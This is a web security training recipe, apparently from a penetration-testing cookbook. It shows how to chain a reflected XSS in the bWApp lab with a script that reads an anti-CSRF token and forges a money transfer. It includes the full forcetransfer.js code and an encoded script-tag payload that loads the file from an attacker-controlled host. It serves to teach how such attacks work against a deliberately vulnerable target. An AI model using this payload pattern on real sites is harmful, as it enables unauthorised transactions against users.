How to do it...

For this recipe, we will use the bWApp application in bee-box, http://192.168.56.13/bWapp in this example, and we will set the security level to Medium.

  1. Once logged in to bWApp, go to the bug Cross Site Request Forgery (Transfer Amount).
  2. Enter an account number and amount and click on the Transfer button.
  3. Let's analyze the following request in Burp Suite. All of the parameters are sent via a GET request; by looking at the token parameter included in the URL, we can infer that there is a CSRF protection in place:

  4. We will try to exploit an XSS and use it to trigger the transfer request. To do that, we first need to find where the token is stored on the client side so that we can retrieve it. Go to the response and look for an input tag with the name token, and take note of its id attribute as well. The following screenshot shows that it is a hidden field of the form:

  5. Next, we will need to prove that there is an exploitable XSS in place, so go to the bug XSS-Reflected (GET) and try to exploit it. As demonstrated in the following screenshot, it is exploitable:

  6. We will use that XSS vulnerability to include a JavaScript file hosted on a server we control, our Kali Linux VM in this exercise. Create a forcetransfer.js file with the following code in it:
// First request: load the transfer page so the anti-CSRF token can be read from it
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "http://192.168.56.13/bWAPP/csrf_2.php", true);
xmlhttp.onreadystatechange = function () {
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
        // Parse the HTML response and read the value of the hidden token field
        var parser = new DOMParser();
        var responseDoc = parser.parseFromString(xmlhttp.responseText, "text/html");
        var token = responseDoc.getElementById('token').value;
        var URL = "http://192.168.56.13/bWAPP/csrf_2.php?account=123-45678-90&amount=100&token=" + token + "&action=transfer";

        // Second request: the transfer itself, now carrying the token just obtained
        var xmlhttp2 = new XMLHttpRequest();
        xmlhttp2.open("GET", URL, true);
        xmlhttp2.send();
    }
};
xmlhttp.send();
  7. Start the Apache web server in Kali Linux and move the file to the web root (the default is /var/www/html).
  8. Now, exploit the XSS, setting the malicious file as the source of the script tag. While logged in to bWApp, in a new tab, navigate to http://192.168.56.13/bWAPP/xss_get.php?firstname=test%3Cscript+src%3Dhttp%3A%2F%2F192.168.56.10%2Fforcetransfer.js%3E%3C%2Fscript%3E&lastname=asd&form=submit. The XSS payload is the value of the firstname parameter (the URL-encoded script tag).
  9. The script will load and execute successfully. To take a look at what actually happened, look at Burp Suite's Proxy history, shown in the next screenshot:

First, the XSS attack is performed, then our malicious file forcetransfer.js is loaded, and this makes the call to csrf_2.php without parameters. This is where our script obtains the anti-CSRF token; it then uses it to send a new request to csrf_2.php, this time with all the parameters necessary to make a transfer, and this succeeds.
